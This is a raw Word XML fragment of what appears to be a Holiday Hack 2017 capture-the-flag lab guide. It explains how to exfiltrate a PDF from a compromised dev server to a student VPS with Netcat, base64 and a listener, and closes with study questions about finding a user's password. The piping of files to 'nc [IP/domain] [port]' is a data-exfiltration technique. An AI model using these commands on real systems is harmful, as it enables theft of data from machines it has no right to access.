        <w:t xml:space="preserve"> the exploit </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r w:rsidR="003C5B36">
        <w:t xml:space="preserve">to get shell.  Your VPS only has one port open </w:t>
      </w:r>
      <w:r w:rsidR="002B14CF">
        <w:t>now</w:t>
      </w:r>
      <w:r w:rsidR="003C5B36">
        <w:t>.  We could open another port and another terminal on the VPS, but a simpler way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is to close the shell and </w:t>
      </w:r>
      <w:r w:rsidR="003C5B36">
        <w:t>put a Netcat command into the exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="003C5B36">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A288A63" w14:textId="7DE5298A" w:rsidR="003C5B36" w:rsidRPr="004B64B2" w:rsidRDefault="003C5B36" w:rsidP="003C5B36">
      <w:r w:rsidRPr="003C5B36">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&lt;sidebar&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003C5B36">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003C5B36">
        <w:t xml:space="preserve">We have </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">moved files with Netcat before, but here’s a quick review.  On the listener end, we want the Netcat output to go to a file and not the terminal.  If the file is long, </w:t>
      </w:r>
      <w:r w:rsidR="00EB5103">
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will only catch the end of the file in the terminal.  The listener will be something like this:</w:t>
      </w:r>
      <w:r w:rsidR="008760C7">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nvl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> [port] &gt; filename</w:t>
      </w:r>
      <w:r w:rsidR="004B64B2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004B64B2" w:rsidRPr="004B64B2">
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="004B64B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B64B2" w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B64B2" w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B64B2" w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nvl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B64B2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
      <w:r w:rsidR="004B64B2" w:rsidRPr="003C5B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> [port] &gt; filename</w:t>
      </w:r>
      <w:r w:rsidR="004B64B2" w:rsidRPr="004B64B2">
        <w:t>, depending on the Netcat version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA25739" w14:textId="5D2BC972" w:rsidR="008760C7" w:rsidRPr="008760C7" w:rsidRDefault="008760C7" w:rsidP="003C5B36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A simple line to send the data</w:t>
      </w:r>
      <w:r w:rsidR="004B64B2">
        <w:t xml:space="preserve"> from the sender</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the listener via Netcat just pipes the file into Netcat like this:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008760C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /the/path/filename | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008760C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008760C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> [IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008760C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>domain name of listener] [port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B17C1" w14:textId="4C4D6349" w:rsidR="003C5B36" w:rsidRPr="008760C7" w:rsidRDefault="002F6A3F" w:rsidP="003C5B36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Sometimes t</w:t>
      </w:r>
      <w:r w:rsidR="003C5B36">
        <w:t xml:space="preserve">he sender may need to be slightly different.  The file is a large pdf and probably contains non-alpha-numeric characters.  If the file does not transfer properly, we’ll need to encode the </w:t>
      </w:r>
      <w:r w:rsidR="008760C7">
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="003C5B36">
        <w:t xml:space="preserve"> the same way that email attachment</w:t>
      </w:r>
      <w:r w:rsidR="008760C7">
        <w:t xml:space="preserve">s are often encoded:  base64.  Note that base64 is not encryption.  It is simply a way to encode binary files in a way that only uses printable characters.  In that case, the sender </w:t>
      </w:r>
      <w:r w:rsidR="008760C7">
        <w:lastRenderedPageBreak/>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="008760C7">
        <w:br/>
      </w:r>
      <w:r w:rsidR="008760C7" w:rsidRPr="008760C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /the/path/filename | base64 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008760C7" w:rsidRPr="008760C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008760C7" w:rsidRPr="008760C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> [IP/domain] [port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B760783" w14:textId="304C79C9" w:rsidR="008760C7" w:rsidRPr="008760C7" w:rsidRDefault="008760C7" w:rsidP="003C5B36">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008760C7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&lt;/sidebar&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E8D61C" w14:textId="42B145DC" w:rsidR="008760C7" w:rsidRDefault="00302392" w:rsidP="003C5B36">
      <w:r>
        <w:t>To get the page, set up a listener on the VPS that redirects to a file</w:t>
      </w:r>
      <w:r w:rsidR="004B64B2">
        <w:t xml:space="preserve"> so the content is saved</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  Run the exploit and make the command (-c) be code that uses cat, a pipe and Netcat to send the page to the listener.  You may have to insert an extra </w:t>
      </w:r>
      <w:r w:rsidR="00775C1D">
        <w:t>pipe and base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B63D7CA" w14:textId="64E569F4" w:rsidR="00775C1D" w:rsidRPr="00775C1D" w:rsidRDefault="00775C1D" w:rsidP="003C5B36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Once the page is safely on your VPS, you can use SCP (or PuTTY SCP</w:t>
      </w:r>
      <w:r w:rsidR="00EB5103">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F6A3F">
        <w:t>pscp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB5103">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EB5103">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comes with PuTTY) to copy the file back to your workstation.  If you had to use base64, you can decode the file on Linux by using:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00775C1D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">cat filename | base64 -d &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00775C1D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>GreatBook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B14CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;snip&gt;.</w:t>
      </w:r>
      <w:r w:rsidRPr="00775C1D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E594D4" w14:textId="75638218" w:rsidR="00775C1D" w:rsidRDefault="00775C1D" w:rsidP="003C5B36">
      <w:r>
        <w:t xml:space="preserve">To get credit for the Great Book Page in your Holiday Hack 2017 Stocking, take a SHA1 hash of it by running </w:t>
      </w:r>
      <w:r w:rsidRPr="00775C1D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sha1sum filename</w:t>
      </w:r>
      <w:r>
        <w:t>, and then enter the hash into the Stocking page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0582CB22" w14:textId="027F0853" w:rsidR="00194AB8" w:rsidRDefault="00194AB8" w:rsidP="00194AB8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Other Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F021C" w14:textId="4B509B45" w:rsidR="00194AB8" w:rsidRPr="00194AB8" w:rsidRDefault="00B737F0" w:rsidP="00194AB8">
      <w:r>
        <w:t xml:space="preserve">The Meterpreter </w:t>
      </w:r>
      <w:r w:rsidR="002678A9">
        <w:t>shell that’s part of Metasploit contains software that allows you to easily transfer files back and forth.  Another way would be to use SCP (part of OpenSSH) that’s included by default in most Linux distributions.  To connect to our VPS with SCP, we would need to upload our private key to the dev server (bad idea)</w:t>
      </w:r>
      <w:r w:rsidR="003C2A18">
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidR="002678A9">
        <w:t xml:space="preserve"> add a new temporary key to our VPS and upload it, or temporarily change our VPS SSH configuration to use passwords.  </w:t>
      </w:r>
      <w:r w:rsidR="002F6A3F">
        <w:t xml:space="preserve">If your VPS has a web server that accepts POST requests, you could send the file with </w:t>
      </w:r>
      <w:r w:rsidR="002F6A3F" w:rsidRPr="002F6A3F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="002F6A3F">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="002F6A3F" w:rsidRPr="002F6A3F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidR="002F6A3F">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="002678A9">
        <w:t>Netcat is easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2BD70" w14:textId="51413F28" w:rsidR="00775C1D" w:rsidRDefault="00775C1D" w:rsidP="00775C1D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F20B8D2" w14:textId="287E141D" w:rsidR="00775C1D" w:rsidRPr="00194AB8" w:rsidRDefault="00775C1D" w:rsidP="00775C1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00194AB8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>What is the file path and file name for the Great Book page on the dev server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D66957" w14:textId="01345A4A" w:rsidR="00775C1D" w:rsidRPr="00194AB8" w:rsidRDefault="00194AB8" w:rsidP="00775C1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00194AB8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>What is the title of the Great Book page?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078716B" w14:textId="6CF53837" w:rsidR="00194AB8" w:rsidRPr="00194AB8" w:rsidRDefault="00194AB8" w:rsidP="00775C1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00194AB8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>What directories are good places to start looking for Alabaster’s password?  Don’t use / as an answer, but directories just belo</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00194AB8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>w that will do.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00194AB8" w:rsidRPr="0019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1DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70FAA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75ADB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9BF0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C702A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7A2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4B"/>
    <w:rsid w:val="00010C49"/>
    <w:rsid w:val="00037C4B"/>
    <w:rsid w:val="000E177D"/>
    <w:rsid w:val="00114C1A"/>
    <w:rsid w:val="00194AB8"/>
    <w:rsid w:val="00214D9D"/>
    <w:rsid w:val="002678A9"/>
    <w:rsid w:val="002A118D"/>
    <w:rsid w:val="002B14CF"/>
    <w:rsid w:val="002F6A3F"/>
    <w:rsid w:val="00302392"/>
    <w:rsid w:val="00314D37"/>
    <w:rsid w:val="003C2A18"/>
    <w:rsid w:val="003C5B36"/>
    <w:rsid w:val="00426272"/>
    <w:rsid w:val="004A3478"/>
    <w:rsid w:val="004B64B2"/>
    <w:rsid w:val="004D2150"/>
    <w:rsid w:val="00564D37"/>
    <w:rsid w:val="0062254B"/>
    <w:rsid w:val="006B63AF"/>
    <w:rsid w:val="00715029"/>
    <w:rsid w:val="00775C1D"/>
    <w:rsid w:val="0080780B"/>
    <w:rsid w:val="008760C7"/>
    <w:rsid w:val="008A7377"/>
    <w:rsid w:val="00953A15"/>
    <w:rsid w:val="00A832CB"/>
    <w:rsid w:val="00AF5D4A"/>
    <w:rsid w:val="00B11CB6"/>
    <w:rsid w:val="00B3097B"/>
    <w:rsid w:val="00B563F1"/>
    <w:rsid w:val="00B737F0"/>
    <w:rsid w:val="00D32645"/>
    <w:rsid w:val="00D572E8"/>
    <w:rsid w:val="00DF7A35"/>
    <w:rsid w:val="00E04EB3"/>
    <w:rsid w:val="00E24E16"/>
    <w:rsid w:val="00E45897"/>
    <w:rsid w:val="00EB5103"/>
    <w:rsid w:val="00FB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9809"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3D888837-A6F0-4E98-A4F0-57960A0F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6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C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2E8"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D572E8"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B563F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5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curityriskadvisors.com/blog/a-smaller-better-jsp-web-shell/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code"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ev.northpolechristmastown.com/orders.xhtml"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pen-testing.sans.org/blog/2017/02/02/pen-test-poster-white-board-bash-bashs-built-in-netcat-clien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log.netspi.com/hacking-with-jsp-shel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9</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dcterms:created xsi:type="dcterms:W3CDTF">2018-02-07T14:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-03T13:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>